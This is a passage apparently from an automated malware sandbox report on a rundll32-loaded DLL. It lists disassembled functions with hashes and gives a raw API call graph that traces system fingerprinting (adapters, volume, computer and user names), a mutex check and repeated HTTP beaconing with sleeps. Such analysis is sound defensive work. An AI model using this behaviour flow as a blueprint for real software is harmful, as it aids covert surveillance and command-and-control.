                                                                                                                                                                                                                                                                      Function 0000000180044C2C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                      • String ID: .$_.,
                                                                                                                                                                                                                                                                      • API String ID: 3215553584-3384562259
                                                                                                                                                                                                                                                                      • Opcode ID: c5e31342db8f2559d412056efb8cb4ce2ddbaaf83501e9c59faeafa9e2557006
                                                                                                                                                                                                                                                                      • Instruction ID: 86f15d9f2fdf1f05cb57339bd986fd197501509ab2478ee385be308a635b250d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5e31342db8f2559d412056efb8cb4ce2ddbaaf83501e9c59faeafa9e2557006
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B41E277A10A4885FBF28A2594C17E92290E78CBE8F57C611FA550B6C5DF74CB8D8708
                                                                                                                                                                                                                                                                      Function 000000018000E744 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                                                                                                                                                                                      • Opcode ID: 3012941d225893ff0a1596aed794f60caa97295d49179766bd7cee36fad85c83
                                                                                                                                                                                                                                                                      • Instruction ID: 98e23b6382448741e885f2483867041e669b118fd1c307fb1a3f8b737a70bd12
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3012941d225893ff0a1596aed794f60caa97295d49179766bd7cee36fad85c83
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37513C7321578886E6A1EF15E4403AE77A4F38DBE0F148125FB8947B96DF38C565CB00
                                                                                                                                                                                                                                                                      Function 000000018004CAF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                                                      • String ID: s
                                                                                                                                                                                                                                                                      • API String ID: 1502251526-453955339
                                                                                                                                                                                                                                                                      • Opcode ID: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                                                                      • Instruction ID: 8ceb7f17a8548fb968498d81ab2351303633656c3688867a1d3cd218ddfc299c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43411332304A4887E3EA8F15E495FED7791F39878CF028116DE0957B81CB38CA4ACB49
                                                                                                                                                                                                                                                                      Function 0000000180014EB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: void$void
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-3746155364
                                                                                                                                                                                                                                                                      • Opcode ID: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                                                                      • Instruction ID: 9e6cfc430d5bfee4d664579300960906288245c07229e058c69c646796c75a2c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6311D76A10B58D8FB52CBA4E8403EC37B0B74C788F54852AEE4A67B55DF388259C750
                                                                                                                                                                                                                                                                      Function 000000018001037C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                      • Opcode ID: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                                                                      • Instruction ID: 75816c31b48d4b3f6ac9eaf605c0ba6bcc738f1132b3e0c24f52f264a28ed543
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B811FB32214B4482EBA28B15E44039A77E5F78CBD8F688225EADD07759DF7DC655CB00
                                                                                                                                                                                                                                                                      Function 000000018000FCAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3568775529-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                                                                      • Instruction ID: d49a7e86271a456fbcda335a6394c0a77c9d8b30d4fb553590f1245fc1ea6585
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0653171150C82FBF69B6658457F622929B4DBD0F58D830FE0546791EE2D878E8700
                                                                                                                                                                                                                                                                      Function 000001FF4B0A1C80 Relevance: 5.2, APIs: 4, Instructions: 177COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastRead
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4100373531-0
                                                                                                                                                                                                                                                                      • Opcode ID: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                                                                      • Instruction ID: 6335f2db976b91a2273927bd39dbc1689edf003861b3a897d5821b2fb13e55c5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4191CA36219B8886DB60CB0AE49036AB7A0F7CDB95F544525EB8E83769DF7CC455CB00

                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                      Execution Coverage:11.5%
                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                      Signature Coverage:1.3%
                                                                                                                                                                                                                                                                      Total number of Nodes:871
                                                                                                                                                                                                                                                                      Total number of Limit Nodes:11
                                                                                                                                                                                                                                                                      execution_graph 3510 30543c4 3515 30541b4 3510->3515 3512 30543cd 3513 30543eb 3512->3513 3536 305c704 NtDelayExecution 3512->3536 3516 30541d4 3515->3516 3537 3056cb4 3516->3537 3518 30541dd 3518->3512 3519 30541d9 3519->3518 3520 30541fa GetCurrentProcess IsWow64Process 3519->3520 3520->3518 3521 3054227 3520->3521 3549 3057274 GetAdaptersInfo 3521->3549 3523 305422c 3523->3518 3524 3054266 CreateMutexW 3523->3524 3524->3518 3525 3054286 GetLastError 3524->3525 3525->3518 3526 30542ac GetModuleHandleW 3525->3526 3556 3054c2c GetModuleHandleW GetCurrentProcessId 3526->3556 3533 30542ec CreateThread 3534 3054317 3533->3534 4168 30543f4 3533->4168 3579 3056c6c CreateThread 3534->3579 3536->3512 3539 3056cbd 3537->3539 3538 3056cf3 3538->3519 3539->3538 3581 305abe8 3539->3581 3550 30572ad 3549->3550 3555 30572d1 3549->3555 3607 305b388 NtAllocateVirtualMemory 3550->3607 3552 30572df 3552->3523 3553 30572b8 GetAdaptersInfo 3553->3555 3555->3552 3609 30582b4 3555->3609 3612 30582f4 3556->3612 3560 3054c7f 3562 3054d17 GetCurrentProcessId 3560->3562 3563 3054d33 3560->3563 3564 3054cf3 3560->3564 3562->3560 3565 3054d44 3563->3565 3566 30542c1 3563->3566 3564->3560 3622 305891c 3564->3622 3628 3054d58 3565->3628 3566->3518 3568 3057314 3566->3568 3569 305b388 NtAllocateVirtualMemory 3568->3569 3570 305732c 3569->3570 3680 305bfc0 3570->3680 3572 305737f 3573 305bfc0 NtAllocateVirtualMemory 3572->3573 3574 30542d1 3573->3574 3574->3518 3575 30571f0 3574->3575 3576 3057208 3575->3576 3577 305bfc0 NtAllocateVirtualMemory 3576->3577 3578 30542e1 3577->3578 3578->3518 3578->3533 3580 3056ca3 3579->3580 3683 3055a64 3579->3683 3580->3518 3584 305b1c8 3581->3584 3582 3056ccf 3582->3538 3585 30599d0 3582->3585 3584->3582 3603 3058a58 3584->3603 3586 305a82d 3585->3586 3587 3056cd8 3586->3587 3588 3058a58 2 API calls 3586->3588 3587->3538 3589 305aa0c 3587->3589 3588->3586 3592 305ab3d 3589->3592 3590 3056ce1 3590->3538 3593 3059350 3590->3593 3591 305a8e0 7 API calls 3591->3592 3592->3590 3592->3591 3595 3059892 3593->3595 3594 3058a58 GetProcAddress GetProcAddressForCaller 3594->3595 3595->3594 3596 3059972 3595->3596 3598 3056cea 3595->3598 3597 3058a58 2 API calls 3596->3597 3597->3598 3598->3538 3599 305b2a4 3598->3599 3602 305b315 3599->3602 3600 305b372 3600->3538 3601 3058a58 2 API calls 3601->3602 3602->3600 3602->3601 3604 3058a72 3603->3604 3605 3058a79 3603->3605 3604->3584 3605->3604 3606 3058b63 GetProcAddress GetProcAddressForCaller 3605->3606 3606->3604 3608 305b3c8 3607->3608 3608->3553 3610 30582ef 3609->3610 3611 30582ce NtFreeVirtualMemory 3609->3611 3610->3552 3611->3610 3631 3058c30 3612->3631 3617 3058d3c 3678 305b470 3617->3678 3620 3058d87 3620->3560 3621 3058d6e wsprintfA 3621->3620 3623 305893a 3622->3623 3624 3058957 3623->3624 3625 305894c RtlGetVersion 3623->3625 3626 3058961 GetVersionExW 3624->3626 3627 305896c 3624->3627 3625->3624 3626->3627 3627->3564 3629 3054d66 CloseHandle 3628->3629 3630 3054d73 3628->3630 3629->3630 3630->3566 3632 3058c4e 3631->3632 3633 3058c60 FindFirstVolumeW 3632->3633 3634 3058c81 GetVolumeInformationW FindVolumeClose 3633->3634 3635 30582fd 3633->3635 3634->3635 3636 3058e18 3635->3636 3637 3058e41 3636->3637 3646 3058fc8 3637->3646 3640 3054c73 3640->3617 3641 305b388 NtAllocateVirtualMemory 3642 3058e63 3641->3642 3643 3058e91 3642->3643 3651 305be64 3642->3651 3644 30582b4 NtFreeVirtualMemory 3643->3644 3644->3640 3647 305b388 NtAllocateVirtualMemory 3646->3647 3648 3058fe4 3647->3648 3649 3058e4b 3648->3649 3655 3058ec8 3648->3655 3649->3640 3649->3641 3652 305be7c 3651->3652 3658 305beac 3652->3658 3654 305bea5 3654->3643 3656 3058eea 3655->3656 3657 3058f05 wsprintfA 3656->3657 3657->3649 3661 305b704 3658->3661 3660 305bedb 3660->3654 3662 305b733 3661->3662 3663 305b718 3661->3663 3667 305b648 3662->3667 3664 30582b4 NtFreeVirtualMemory 3663->3664 3666 305b725 3664->3666 3666->3660 3668 305b66f 3667->3668 3670 305b679 3667->3670 3675 305b430 3668->3675 3672 305b388 NtAllocateVirtualMemory 3670->3672 3674 305b698 3670->3674 3671 305b6a5 3671->3666 3672->3674 3673 30582b4 NtFreeVirtualMemory 3673->3671 3674->3671 3674->3673 3676 305b445 VirtualQuery 3675->3676 3677 305b441 3675->3677 3676->3677 3677->3670 3679 3058d5a GetUserNameA 3678->3679 3679->3620 3679->3621 3681 305b388 NtAllocateVirtualMemory 3680->3681 3682 305bfdc 3681->3682 3682->3572 3685 3055aed 3683->3685 3690 3055b5a new[] 3685->3690 3789 305c704 NtDelayExecution 3685->3789 3686 3055ba7 3687 305b388 NtAllocateVirtualMemory 3687->3690 3689 305c704 NtDelayExecution 3691 3055c2f new[] 3689->3691 3690->3686 3690->3687 3690->3691 3698 305bfc0 NtAllocateVirtualMemory 3690->3698 3701 305be64 3 API calls 3690->3701 3715 30582b4 NtFreeVirtualMemory 3690->3715 3724 3055484 3690->3724 3735 3058424 3690->3735 3761 305b770 3690->3761 3769 3056fc0 3690->3769 3773 3054e28 3690->3773 3790 3058bdc 3690->3790 3691->3689 3691->3690 3693 30582b4 NtFreeVirtualMemory 3691->3693 3694 305bfc0 NtAllocateVirtualMemory 3691->3694 3695 3056404 wsprintfA 3691->3695 3696 3055f36 wsprintfA 3691->3696 3697 3056025 wsprintfA 3691->3697 3700 30582b4 NtFreeVirtualMemory 3691->3700 3703 305b388 NtAllocateVirtualMemory 3691->3703 3705 305b388 NtAllocateVirtualMemory 3691->3705 3707 305b388 NtAllocateVirtualMemory 3691->3707 3708 30582b4 NtFreeVirtualMemory 3691->3708 3711 3056fc0 NtAllocateVirtualMemory 3691->3711 3717 3058bdc 3 API calls 3691->3717 3718 30569a2 GetExitCodeThread 3691->3718 3720 30569de GetExitCodeThread 3691->3720 3721 305b388 NtAllocateVirtualMemory 3691->3721 3723 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3691->3723 3796 3056cfc 3691->3796 3800 3055734 3691->3800 3693->3690 3694->3691 3695->3691 3696->3690 3697->3690 3698->3690 3700->3690 3701->3690 3704 3056187 WideCharToMultiByte 3703->3704 3706 305be64 3 API calls 3704->3706 3709 3056243 WideCharToMultiByte 3705->3709 3706->3691 3712 30562ff WideCharToMultiByte 3707->3712 3708->3691 3710 305be64 3 API calls 3709->3710 3710->3691 3711->3691 3713 305be64 3 API calls 3712->3713 3713->3691 3715->3690 3717->3691 3718->3691 3720->3691 3721->3691 3723->3691 3725 30554bc 3724->3725 3726 305b388 NtAllocateVirtualMemory 3725->3726 3727 30554e2 3726->3727 3728 305b388 NtAllocateVirtualMemory 3727->3728 3729 30554f8 InternetCrackUrlA 3728->3729 3730 3055554 3729->3730 3731 305556e 3729->3731 3732 30582b4 NtFreeVirtualMemory 3730->3732 3731->3690 3733 3055561 3732->3733 3734 30582b4 NtFreeVirtualMemory 3733->3734 3734->3731 3736 305b388 NtAllocateVirtualMemory 3735->3736 3737 3058452 3736->3737 3738 3058466 GetAdaptersInfo 3737->3738 3739 305845f 3737->3739 3740 305865b 3738->3740 3741 305848d 3738->3741 3739->3690 3743 3058688 3740->3743 3745 30582b4 NtFreeVirtualMemory 3740->3745 3742 305b388 NtAllocateVirtualMemory 3741->3742 3744 3058498 GetAdaptersInfo 3742->3744 3746 305b388 NtAllocateVirtualMemory 3743->3746 3747 30584c5 3744->3747 3745->3743 3748 305869b 3746->3748 3752 30584e6 wsprintfA 3747->3752 3748->3739 3749 30586ac GetComputerNameExA 3748->3749 3750 3058729 GetComputerNameExA 3749->3750 3754 30586c5 3749->3754 3751 30587db 3750->3751 3756 3058746 3750->3756 3753 30582b4 NtFreeVirtualMemory 3751->3753 3757 3058502 3752->3757 3753->3739 3755 30586fa wsprintfA 3754->3755 3755->3750 3758 30587a6 wsprintfA 3756->3758 3757->3740 3759 3058627 wsprintfA 3757->3759 3760 30585b2 wsprintfA 3757->3760 3758->3751 3759->3740 3759->3757 3760->3757 3763 305b7aa 3761->3763 3762 305b7b5 3762->3691 3763->3762 3764 305b7f0 3763->3764 3810 305c00c 3763->3810 3765 305b822 3764->3765 3767 305c00c NtAllocateVirtualMemory 3764->3767 3765->3762 3768 305c00c NtAllocateVirtualMemory 3765->3768 3767->3765 3768->3762 3770 3056fd5 3769->3770 3772 3056fe6 3769->3772 3771 305b388 NtAllocateVirtualMemory 3770->3771 3770->3772 3771->3772 3772->3690 3786 3054e5d 3773->3786 3774 3055484 3 API calls 3774->3786 3775 3054d78 InternetOpenW InternetConnectA 3778 3054ec6 3775->3778 3776 30582b4 NtFreeVirtualMemory 3776->3778 3777 305bfc0 NtAllocateVirtualMemory 3777->3778 3778->3775 3778->3776 3778->3777 3779 3054fc6 3778->3779 3778->3786 3780 3055057 3779->3780 3781 305504c InternetCloseHandle 3779->3781 3783 305505f InternetCloseHandle 3780->3783 3784 305506a 3780->3784 3781->3780 3783->3784 3784->3691 3785 30582b4 NtFreeVirtualMemory 3785->3786 3786->3774 3786->3778 3786->3779 3786->3785 3787 3055022 3786->3787 3813 3055078 3786->3813 3818 3055160 3786->3818 3787->3779 3789->3685 3791 305b470 3790->3791 3792 3058bef GetCursorPos 3791->3792 3793 3058c02 GetTickCount 3792->3793 3794 3058bfe 3792->3794 3843 305b620 RtlRandom 3793->3843 3794->3690 3797 3056d12 3796->3797 3798 305b388 NtAllocateVirtualMemory 3797->3798 3799 3056d2f 3797->3799 3798->3799 3799->3691 3801 3055792 3800->3801 3802 305bfc0 NtAllocateVirtualMemory 3801->3802 3808 30557b3 3802->3808 3803 30557c0 3803->3691 3805 3055a49 3806 30582b4 NtFreeVirtualMemory 3805->3806 3806->3803 3808->3803 3808->3805 3844 305cf4c 3808->3844 3850 305cde8 3808->3850 3860 30544c8 3808->3860 3811 305b388 NtAllocateVirtualMemory 3810->3811 3812 305c034 3811->3812 3812->3764 3814 30550bc InternetReadFile 3813->3814 3815 3055104 3814->3815 3817 30550de 3814->3817 3815->3778 3816 305b704 3 API calls 3816->3817 3817->3814 3817->3815 3817->3816 3819 305b388 NtAllocateVirtualMemory 3818->3819 3820 30551ab 3819->3820 3821 305be64 3 API calls 3820->3821 3823 3055204 3821->3823 3822 3055265 3825 3055292 3822->3825 3826 3055315 3822->3826 3823->3822 3824 305be64 3 API calls 3823->3824 3828 3055253 3824->3828 3829 30552c7 HttpOpenRequestA 3825->3829 3827 3055350 HttpOpenRequestA 3826->3827 3830 305539c 3827->3830 3831 305be64 3 API calls 3828->3831 3829->3830 3832 30553a4 3830->3832 3833 30553d6 3830->3833 3834 30553b3 InternetSetOptionA 3830->3834 3831->3822 3835 3055456 3832->3835 3837 30582b4 NtFreeVirtualMemory 3832->3837 3836 3055424 HttpSendRequestA 3833->3836 3841 30553e0 3833->3841 3834->3833 3835->3786 3838 3055443 3836->3838 3837->3835 3838->3832 3839 305544c 3838->3839 3840 30582b4 NtFreeVirtualMemory 3839->3840 3840->3835 3842 30553fb HttpSendRequestA 3841->3842 3842->3838 3843->3794 3845 305cf5c 3844->3845 3848 305cf5a 3844->3848 3846 305cfaa 3845->3846 3849 30582b4 NtFreeVirtualMemory 3845->3849 3847 30582b4 NtFreeVirtualMemory 3846->3847 3847->3848 3848->3808 3849->3845 3852 305ce04 3850->3852 3851 305b388 NtAllocateVirtualMemory 3853 305ce6b 3851->3853 3852->3851 3857 305ce3b 3852->3857 3854 305bfc0 NtAllocateVirtualMemory 3853->3854 3853->3857 3855 305ce9d 3854->3855 3856 305b388 NtAllocateVirtualMemory 3855->3856 3858 305cebc 3856->3858 3857->3808 3858->3857 3859 30582b4 NtFreeVirtualMemory 3858->3859 3859->3857 3895 30544ec 3860->3895 3861 30547e3 3865 3054900 3861->3865 3866 30547ee 3861->3866 3862 3054799 3863 30547a4 3862->3863 3864 3054852 3862->3864 3867 305494c 3863->3867 3868 30547af 3863->3868 3877 305bfc0 NtAllocateVirtualMemory 3864->3877 3923 3054334 3865->3923 3878 30549ec 3866->3878 3879 305480f 3866->3879 3884 30547de 3866->3884 3977 3052b28 3867->3977 3870 3054931 3868->3870 3871 30547ba 3868->3871 3944 3052d50 CreateToolhelp32Snapshot 3870->3944 3874 30547c5 3871->3874 3875 3054942 3871->3875 3873 3054905 3873->3884 3928 305c704 NtDelayExecution 3873->3928 3885 30547cc 3874->3885 3886 305483e 3874->3886 3976 305321c CreateThread 3875->3976 3896 3054870 3877->3896 3997 3057dfc 3878->3997 3880 30549f8 3879->3880 3881 305481a 3879->3881 3880->3884 4008 3057f54 3880->4008 3881->3884 4021 3054a20 3881->4021 3884->3808 3889 30547d7 3885->3889 3890 305491d 3885->3890 3911 3057940 3886->3911 3889->3884 3898 3057c98 3889->3898 3929 3057768 3890->3929 3895->3861 3895->3862 3896->3884 3897 30582b4 NtFreeVirtualMemory 3896->3897 3897->3884 3899 3057cb7 3898->3899 3900 3057cc4 MultiByteToWideChar 3899->3900 4029 3057a84 3900->4029 3903 